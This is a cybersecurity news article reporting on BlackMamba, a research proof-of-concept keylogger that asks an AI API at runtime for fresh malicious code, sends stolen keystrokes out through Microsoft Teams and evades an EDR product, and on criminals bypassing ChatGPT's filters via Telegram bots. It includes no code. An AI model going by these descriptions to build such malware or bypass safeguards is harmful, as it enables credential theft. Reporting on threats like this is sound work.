22 C
Paris
Monday, June 24, 2024

Malware Uses AI to Avoid Detection

With the rise of artificial intelligence (AI), cybercriminals have been developing new exploits that can evade even the most sophisticated cybersecurity products.

AI Malware

The latest proof-of-concept (PoC) malware, named “BlackMamba” by HYAS researchers, is a prime example of this growing threat. BlackMamba is designed to eliminate the need for command and control infrastructure and generate new malware on the fly, making it extremely difficult to detect.

- Advertisement -

Leveraging OpenAI, BlackMamba uses a benign executable that reaches out to a high-reputation API at runtime. It then returns synthesized, malicious code needed to steal an infected user’s keystrokes, and executes the dynamically generated code within the context of the benign program. This makes the malicious component of the malware truly polymorphic, meaning that every time BlackMamba executes, it re-synthesizes its keylogging capability.

The keylogger collects sensitive information, including usernames, passwords, and credit card numbers. The data is then exfiltrated using Microsoft Teams and sent to an attacker-controlled Teams channel. HYAS researchers tested BlackMamba against an industry-leading EDR solution, which repeatedly failed to detect the threat.

A New Breed of Threat

BlackMamba is just one example of a new breed of malware that is virtually undetectable by today’s predictive security solutions. By eliminating command and control communication and generating new, unique code at runtime, these malware strains pose a very real threat. According to HYAS principal security engineer Jeff Sims, “the threats posed by this new breed of malware are very real.”

In fact, CyberArk warned earlier this year that OpenAI’s ChatGPT tool could be leveraged to create polymorphic malware that’s extremely difficult to detect. More recently, Check Point researchers have warned that cybercriminals are actively bypassing ChatGPT’s content filters by creating and selling access to Telegram bots that leverage ChatGPT’s API. This allows for malicious content creation, such as phishing emails and malware code, without the limitations or barriers that ChatGPT has set on their user interface.

 | Website

Dimitris is an Information Technology and Cybersecurity professional with more than 20 years of experience in designing, building and maintaining efficient and secure IT infrastructures.
Among others, he is a certified: CISSP, CISA, CISM, ITIL, COBIT and PRINCE2, but his wide set of knowledge and technical management capabilities go beyond these certifications. He likes acquiring new skills on penetration testing, cloud technologies, virtualization, network security, IoT and many more.

spot_img

Also Read